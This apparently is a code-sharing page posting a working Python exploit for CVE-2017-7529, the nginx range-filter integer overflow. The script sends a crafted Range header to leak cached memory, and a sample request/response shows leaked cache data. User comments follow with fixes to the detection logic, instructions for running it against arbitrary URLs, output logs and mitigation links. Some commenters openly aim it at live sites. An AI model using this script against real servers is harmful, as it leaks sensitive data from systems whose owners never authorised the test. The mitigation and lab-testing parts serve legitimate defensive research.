[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability

[nixawk]

Description

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

#!/usr/bin/python
# -*- coding:utf-8 -*-

# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529

import requests
import logging
import sys


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_http_request(url, headers={}, timeout=8.0):
    httpResponse   = requests.get(url, headers=headers, timeout=timeout)
    httpHeaders    = httpResponse.headers

    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


def exploit(url):
    log.info("target: %s", url)
    httpResponse   = send_http_request(url)

    content_length = httpResponse.headers.get('Content-Length', 0)
    bytes_length   = int(content_length) + 623
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    exploit(url)


"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

"""

References

1. https://nvd.nist.gov/vuln/detail/CVE-2017-7529
2. https://hub.docker.com/r/vulapps/cve-2017-7529/

[vadimik]

Hi, could you tell me ho to use exploit. Thenks!

[Jaganmohan029]

Copy the code and paste it in notepad of windows or whatever the OS you're using and run it using the following command python "text file name".py "URL you want to exploit"

ex: python3 test.py http://www."URL".com

[siochs]

Hmm, just tried the following: docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0 docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world On the host, i added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved. curl -L foo.bar.com outputs "Hello World", so the nginx-proxy is working. python CVE-2017-7529.py http://foo.bar.com/etc/fstab outputs

INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable

According to Dockerfile and to the proxy replies the nginx-version is 1.11.10, so the bug should apply, right?

[nixawk]

Thanks @siochs . I will try to review it.

[woei66]

is there solution for this? is it a high risk issue?

[woei66]

I found a article about this issue and looks like there is a patch for this issue. Let's wait for the new release with this patch code. Thank you.

https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html

the following configuration can be used as a temporary workaround: max_ranges 1; http://nginx.org/download/patch.2017.ranges.txt

[r3k2]

https://access.redhat.com/security/cve/cve-2017-7529 FYI.

[siochs]

Still curious why the Exploit does not work using a vulnerable nginx-proxy runnning in a docker container.

[noraj]

You may want to submit your exploit @ https://www.exploit-db.com/submit/

[murat-kaya]

@siochs Change this; "Content-Range" in httpResponse.text to this "Content-Range" in httpResponse.headers

[qre0ct]

This still does not seem to work and I get the same error as @siochs . Any further suggestions ?

[jatoch]

It didnt work for me aswell

[sangeeta667143]

didnt work for me as well.. same output for me also NFO:main:target: http://www.examlpe.com INFO:main:status: 200: Server: nginx/1.11.10 INFO:main:status: 200: Server: nginx/1.11.10 INFO:main:[?] Unknown Vulnerable

[tiropas]

what version of python are you all using? sometimes if the version isn't correct python gives out errors.

[ghost]

I get the same error as @siochs.any idea how to resolve it

[jatoch]

INFO:main:[?] Unknown Vulnerable

[avi2606]

same error here too INFO:main:status: 200: Server: nginx INFO:main:status: 200: Server: nginx INFO:main:[?] Unknown Vulnerable

[Abdelkad3r]

same error here too: INFO:main:target: https://url.com INFO:main:status: 200: Server: nginx/1.12.1 INFO:main:status: 200: Server: nginx/1.12.1 INFO:main:[?] Unknown Vulnerable

[iamdevnull]

same error here too:

INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu) INFO:__main__:[?] Unknown Vulnerable

any idea ?

[jatoch]

Not vulnerable: 1.13.3+, 1.12.1+ Vulnerable: 0.5.6-1.13.2

[theaayushanand]

Change "Content-Range" in httpResponse.text to "Content-Range" in httpResponse.headers

[elcolie]

I got httpResponse.status_code == 200 Is that OK?

[sakurakishiro]

the same error . INFO:__main__:target: (http://www.****.com) INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:[?] Unknown Vulnerable

[hlw0159]

hey i find nginx/1.13.9 cve???

[technick333]

in line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text: need to be replaced by httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

[hlw0159]

I am looking for nginx1.14.1 cve. Is there ??

[LJ-Silver]

in line if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text: need to be replaced by httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

After that change, I'm still getting:

INFO:main:status: 200: Server: nginx/1.10.3 INFO:main:[?] Unknown Vulnerable

any idea?

[RackunSec]

Hello, I got here while searching for an exploit from a HTB system.

To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        print("[!] Target not vulnerable: HTTP response code: "+str(httpResponse.status_code))

This way, you can actually see the HTTP response code from the target server. If it's not "206" as the logic shows in the exploit test code, if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers then the server could already be patched for this vulnerability.

This is probably the case if Ngnix is installed from distribution's package repositories.

I hope that this helps. ~Douglas

[skesineni]

Hello, We've updated our Nginx to new version 1.15.9 but still getting Vulnerable to CVE-2017-7529 message. Why is it still showing that message instead of Unknown Vulnerable after we updated to latest version. Can anyone give any inputs? Thanks!

INFO:main:status: 200: Server: INFO:main:status: 206: Server: INFO:main:[+] Vulnerable to CVE-2017-7529

[marcelo321]

it appears that nginx/1.12.1 isn't vunerable, but it is on the range 0.5.6 - 1.13.2. can someone verify this please??

[snorez]

This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:

NOT

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

We need a image file to do this. The ngx_http_range_header_filter() check r->allow_range, which is set when the file acquired is an image.

I compiled nginx 1.14.0 without this patch.

test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}

--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325


INFO:__main__:[+] Vulnerable to CVE-2017-7529

[thehappydinoa]

I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115

[hackersden09]

anyone can tell me what is the mean of this responce i wants to exploit this vul INFO:main:status: 200: Server: nginx/1.10.3 INFO:main:status: 200: Server: nginx/1.10.3 INFO:main:[?] Unknown Vulnerable

[rjw245]

I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115

The gist ignores snorez advice to look for Content-Range in the response text as opposed to the header.

[rjw245]

This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:

NOT

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

We need a image file to do this. The ngx_http_range_header_filter() check r->allow_range, which is set when the file acquired is an image.

I compiled nginx 1.14.0 without this patch.

test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}

--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325


INFO:__main__:[+] Vulnerable to CVE-2017-7529

@snorez Will HTTPS not work for reproducing this exploit?